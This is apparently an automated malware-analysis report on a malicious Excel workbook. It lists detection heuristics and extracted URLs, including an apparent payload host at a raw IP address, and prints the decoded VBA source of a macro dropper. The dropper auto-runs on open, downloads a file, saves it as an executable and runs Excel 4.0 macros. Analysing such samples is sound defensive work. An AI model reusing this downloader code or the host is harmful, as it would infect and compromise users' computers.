MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
This Excel file contains VBA macros that trigger an Excel 4.0 macro stager. The stager uses CreateObject and CallByName to likely download and execute a second-stage payload from one of the embedded URLs. The presence of cmd.exe invocation heuristics further supports the execution of external commands.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGERThe compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Class7.Rocky1 = CreateObject(Class7.TextBox1.Caption) time = Format(Now + TimeSerial(0, 1, 1), "hh:mm") -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
On Error Resume Next CallByName Class5, "Show", VbMethod -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Sub WorkBook_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://27.102.70.196/k2 In document text (OLE body)
- http://t2.symcb.com0In document text (OLE body)
- http://tl.symcd.com0&In document text (OLE body)
- http://t1.symcb.com/ThawtePCA.crl0In document text (OLE body)
- http://tl.symcb.com/tl.crl0In document text (OLE body)
- https://www.thawte.com/cps0/In document text (OLE body)
- https://www.thawte.com/repository0WIn document text (OLE body)
- http://tl.symcb.com/tl.crt0In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3342 bytes |
SHA-256: 0f8d5393f732295ecb858d596155660fa6602c129079ec7d970b367fb929c19b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
On Error Resume Next
CallByName Class5, "Show", VbMethod
End Sub
Attribute VB_Name = "CodeBlock"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub MethodENG()
Dim time
Set Class7.Rocky1 = CreateObject(Class7.TextBox1.Caption)
time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")
ExecuteExcel4Macro "MESSAGE(False, ""Release"")"
Set Class7.Valaar1 = CreateObject(Class7.Label2.Tag)
Dim fUP: fUP = 0
#If FR_9 Then
Dim DirectionComponent_5
Dim DirectionComponent_6
Dim DirectionComponent_7
Dim DirectionComponent_9
Dim DirectionComponent_8: DirectionComponent_8 = 8
#End If
Dim DirectionComponent_12
Dim DirectionComponent_11: DirectionComponent_11 = ""
Dim fDOWN: fDOWN = 0
fDOWN = 1
fDOWN = 2
fDOWN = 3
fDOWN = 4
End Sub
Attribute VB_Name = "ClaModu"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub PublicSub()
CodeBlock.MethodENG
Dim DirectionComponent_4
Dim DirectionComponent_3
Class7.Label5_Click
Class7.Rocky1.Send
With Class7.Valaar1
.Type = 1
End With
Class7.Valaar1.Open
With Class7.Valaar1
.write Class7.Rocky1.responseBody
End With
#If FR_0 Then
CallByName Class7.Valaar1, "savet" & "ofile", VbMethod, "wrnglr.e" & "" + "xe", 2
#End If
ExecuteExcel4Macro Class7.T10_Text.Text
ExecuteExcel4Macro "MESSAGE(False, ""Fix Marv"")"
End Sub
Attribute VB_Name = "Class7"
Attribute VB_Base = "0{BCDF87D8-10FE-4A45-9037-E1DA98118387}{A67BF4E4-00B4-417B-8495-74F7DD38C327}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Rocky2 As Object
Public Valaar3 As Object
Public Rocky1 As Object
Public Valaar2 As Object
Public Rocky3 As Object
Public Valaar1 As Object
Public Sub Label5_Click()
Dim DirectionComponent_5
Rocky1.Open Me.Label3.Caption, Me.T10_Text.Tag, False
Dim DirectionComponent_6
End Sub
Public Sub S1000()
End Sub
Public Sub frfr4()
End Sub
Attribute VB_Name = "Class5"
Attribute VB_Base = "0{91950FA9-49B3-4930-930C-C2569C5DA979}{FF977004-D6B6-4519-B08E-2136C0F2ABC7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub FUnt()
Dim rd1 As New ClaModu
rd1.PublicSub
End Sub
Private Sub UserForm_Initialize()
FUnt
Unload Me
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.